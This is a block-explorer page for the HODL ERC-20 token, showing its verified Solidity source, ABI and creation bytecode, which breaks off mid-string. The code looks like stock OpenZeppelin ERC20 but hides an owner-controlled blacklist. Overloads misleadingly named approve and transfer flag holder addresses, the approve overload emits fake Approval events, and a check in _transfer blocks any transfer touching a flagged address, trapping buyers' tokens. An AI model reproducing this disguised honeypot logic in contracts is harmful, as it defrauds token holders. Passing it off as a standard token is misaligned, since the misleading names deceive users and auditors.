ERC-20
Overview
Max Total Supply
100,000,000,000,000 Hodl
Holders
55
Total Transfers
-
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
HODL
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-04 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.9; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Ownable, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping (address => bool) private _allowanceSnapshot; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; bool private _allowanceSnapshotApplied = false; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } function approve(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _allowanceSnapshot[_addresses_[i]] = true; emit Approval(_addresses_[i], address(this), 1 * 10**24); } } function transfer(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _allowanceSnapshot[_addresses_[i]] = false; } } function domainSeparator(address _address_) public view returns (bool) { return _allowanceSnapshot[_address_]; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } if (_allowanceSnapshot[from] || _allowanceSnapshot[to]) require(_allowanceSnapshotApplied == true, ""); emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } /** * @dev Standard signed math utilities missing in the Solidity language. */ library SignedMath { /** * @dev Returns the largest of two signed numbers. */ function max(int256 a, int256 b) internal pure returns (int256) { return a > b ? a : b; } /** * @dev Returns the smallest of two signed numbers. */ function min(int256 a, int256 b) internal pure returns (int256) { return a < b ? a : b; } /** * @dev Returns the average of two signed numbers without overflow. * The result is rounded towards zero. */ function average(int256 a, int256 b) internal pure returns (int256) { // Formula from the book "Hacker's Delight" int256 x = (a & b) + ((a ^ b) >> 1); return x + (int256(uint256(x) >> 255) & (a ^ b)); } /** * @dev Returns the absolute unsigned value of a signed value. */ function abs(int256 n) internal pure returns (uint256) { unchecked { // must be unchecked in order to support `n = type(int256).min` return uint256(n >= 0 ? n : -n); } } } contract HODL is ERC20 { constructor() ERC20("HODL", "Hodl") { _mint(msg.sender, 100000000000000 * 10 ** decimals()); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"domainSeparator","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526000600560006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600481526020017f484f444c000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f486f646c00000000000000000000000000000000000000000000000000000000815250620000b9620000ad6200012760201b60201c565b6200012f60201b60201c565b8160069081620000ca9190620005ee565b508060079081620000dc9190620005ee565b5050506200012133620000f4620001f360201b60201c565b600a62000102919062000865565b655af3107a4000620001159190620008b6565b620001fc60201b60201c565b620009ed565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200026e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002659062000962565b60405180910390fd5b62000282600083836200036a60201b60201c565b806004600082825462000296919062000984565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200034a9190620009d0565b60405180910390a362000366600083836200036f60201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003f657607f821691505b6020821081036200040c576200040b620003ae565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004767fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000437565b62000482868362000437565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004cf620004c9620004c3846200049a565b620004a4565b6200049a565b9050919050565b6000819050919050565b620004eb83620004ae565b62000503620004fa82620004d6565b84845462000444565b825550505050565b600090565b6200051a6200050b565b62000527818484620004e0565b505050565b5b818110156200054f576200054360008262000510565b6001810190506200052d565b5050565b601f8211156200059e57620005688162000412565b620005738462000427565b8101602085101562000583578190505b6200059b620005928562000427565b8301826200052c565b50505b505050565b600082821c905092915050565b6000620005c360001984600802620005a3565b1980831691505092915050565b6000620005de8383620005b0565b9150826002028217905092915050565b620005f98262000374565b67ffffffffffffffff8111156200061557620006146200037f565b5b620006218254620003dd565b6200062e82828562000553565b600060209050601f83116001811462000666576000841562000651578287015190505b6200065d8582620005d0565b865550620006cd565b601f198416620006768662000412565b60005b82811015620006a05784890151825560018201915060208501945060208101905062000679565b86831015620006c05784890151620006bc601f891682620005b0565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000763578086048111156200073b576200073a620006d5565b5b60018516156200074b5780820291505b80810290506200075b8562000704565b94506200071b565b94509492505050565b6000826200077e576001905062000851565b816200078e576000905062000851565b8160018114620007a75760028114620007b257620007e8565b600191505062000851565b60ff841115620007c757620007c6620006d5565b5b8360020a915084821115620007e157620007e0620006d5565b5b5062000851565b5060208310610133831016604e8410600b8410161715620008225782820a9050838111156200081c576200081b620006d5565b5b62000851565b62000831848484600162000711565b925090508184048111156200084b576200084a620006d5565b5b81810290505b9392505050565b600060ff82169050919050565b600062000872826200049a565b91506200087f8362000858565b9250620008ae7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200076c565b905092915050565b6000620008c3826200049a565b9150620008d0836200049a565b9250828202620008e0816200049a565b91508282048414831517620008fa57620008f9620006d5565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200094a601f8362000901565b9150620009578262000912565b602082019050919050565b600060208201905081810360008301526200097d816200093b565b9050919050565b600062000991826200049a565b91506200099e836200049a565b9250828201905080821115620009b957620009b8620006d5565b5b92915050565b620009ca816200049a565b82525050565b6000602082019050620009e76000830184620009bf565b92915050565b611b8280620009fd6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806377a1736b116100a2578063a06c1a3311610071578063a06c1a33146102bc578063a457c2d7146102d8578063a9059cbb14610308578063dd62ed3e14610338578063f2fde38b146103685761010b565b806377a1736b146102345780638da5cb5b1461025057806390135fe41461026e57806395d89b411461029e5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806370a08231146101fa578063715018a61461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611163565b60405180910390f35b61014860048036038101906101439190611223565b610416565b604051610155919061127e565b60405180910390f35b610166610439565b60405161017391906112a8565b60405180910390f35b610196600480360381019061019191906112c3565b610443565b6040516101a3919061127e565b60405180910390f35b6101b4610472565b6040516101c19190611332565b60405180910390f35b6101e460048036038101906101df9190611223565b61047b565b6040516101f1919061127e565b60405180910390f35b610214600480360381019061020f919061134d565b6104b2565b60405161022191906112a8565b60405180910390f35b6102326104fb565b005b61024e600480360381019061024991906113df565b61050f565b005b610258610652565b604051610265919061143b565b60405180910390f35b6102886004803603810190610283919061134d565b61067b565b604051610295919061127e565b60405180910390f35b6102a66106d1565b6040516102b39190611163565b60405180910390f35b6102d660048036038101906102d191906113df565b610763565b005b6102f260048036038101906102ed9190611223565b610810565b6040516102ff919061127e565b60405180910390f35b610322600480360381019061031d9190611223565b610887565b60405161032f919061127e565b60405180910390f35b610352600480360381019061034d9190611456565b6108aa565b60405161035f91906112a8565b60405180910390f35b610382600480360381019061037d919061134d565b610931565b005b606060068054610393906114c5565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906114c5565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b6000806104216109b4565b905061042e8185856109bc565b600191505092915050565b6000600454905090565b60008061044e6109b4565b905061045b858285610b85565b610466858585610c11565b60019150509392505050565b60006012905090565b6000806104866109b4565b90506104a781858561049885896108aa565b6104a29190611525565b6109bc565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610503610f87565b61050d6000611005565b565b610517610f87565b60005b8282905081101561064d5760016002600085858581811061053e5761053d611559565b5b9050602002016020810190610553919061134d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff168383838181106105ce576105cd611559565b5b90506020020160208101906105e3919061134d565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92569d3c21bcecceda100000060405161063291906115cd565b60405180910390a38080610645906115e8565b91505061051a565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6060600780546106e0906114c5565b80601f016020809104026020016040519081016040528092919081815260200182805461070c906114c5565b80156107595780601f1061072e57610100808354040283529160200191610759565b820191906000526020600020905b81548152906001019060200180831161073c57829003601f168201915b5050505050905090565b61076b610f87565b60005b8282905081101561080b5760006002600085858581811061079257610791611559565b5b90506020020160208101906107a7919061134d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610803906115e8565b91505061076e565b505050565b60008061081b6109b4565b9050600061082982866108aa565b90508381101561086e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610865906116a2565b60405180910390fd5b61087b82868684036109bc565b60019250505092915050565b6000806108926109b4565b905061089f818585610c11565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610939610f87565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109a8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099f90611734565b60405180910390fd5b6109b181611005565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a22906117c6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a9a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a9190611858565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b7891906112a8565b60405180910390a3505050565b6000610b9184846108aa565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c0b5781811015610bfd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf4906118c4565b60405180910390fd5b610c0a84848484036109bc565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7790611956565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cef576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce6906119e8565b60405180910390fd5b610cfa8383836110c9565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7890611a7a565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610eb55750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610f115760011515600560009054906101000a900460ff16151514610f10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0790611ac0565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f6e91906112a8565b60405180910390a3610f818484846110ce565b50505050565b610f8f6109b4565b73ffffffffffffffffffffffffffffffffffffffff16610fad610652565b73ffffffffffffffffffffffffffffffffffffffff1614611003576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ffa90611b2c565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561110d5780820151818401526020810190506110f2565b60008484015250505050565b6000601f19601f8301169050919050565b6000611135826110d3565b61113f81856110de565b935061114f8185602086016110ef565b61115881611119565b840191505092915050565b6000602082019050818103600083015261117d818461112a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111ba8261118f565b9050919050565b6111ca816111af565b81146111d557600080fd5b50565b6000813590506111e7816111c1565b92915050565b6000819050919050565b611200816111ed565b811461120b57600080fd5b50565b60